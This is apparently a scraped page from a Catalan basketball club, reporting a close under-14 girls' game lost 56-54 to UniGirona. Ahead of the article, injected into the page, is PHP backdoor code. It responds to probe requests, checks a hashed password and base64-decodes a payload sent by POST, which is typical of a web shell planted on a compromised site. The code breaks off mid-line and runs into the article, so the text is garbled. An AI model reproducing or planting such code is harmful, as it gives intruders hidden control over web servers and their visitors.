function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil femení 07A perd en els últims minuts contra el GEiEG UniGirona (56-54) - Tgn Bàsquet Club -

L’Infantil femení 07A perd en els últims minuts contra el GEiEG UniGirona (56-54)

Updated: maig 11, 2021

L’infantil femení 07A va batallar fins a final en un partit molt ajustat contra l’Uni Girona. La sortida de les infantils va ser molt bona, aguantant el ritme rival (12-12). Però les gironines van pujar la intensitat i gràcies al rebot defensiu van fer un parcial de 9-2. Durant el segon quart les liles van aconseguir escurçar distàncies i marxaven a la mitja part amb un resultat de 31-28. La defensa del segon i tercer quart va millorar estrepitosament, dominant el rebot defensiu i incomodant els atacs de les gironines, que només van aconseguir posar 17 punts en aquests 20 minuts. Però en el desenllaç del matx l’Uni es va acabar imposant per dos punts al marcador. Una derrota dura per les del TGN que van estar a tocar de la seva primera victòria en la categoria Preferent A. Val a dir que les liles han millorat i molt respecte al partit d’anada disputat a casa (44-71).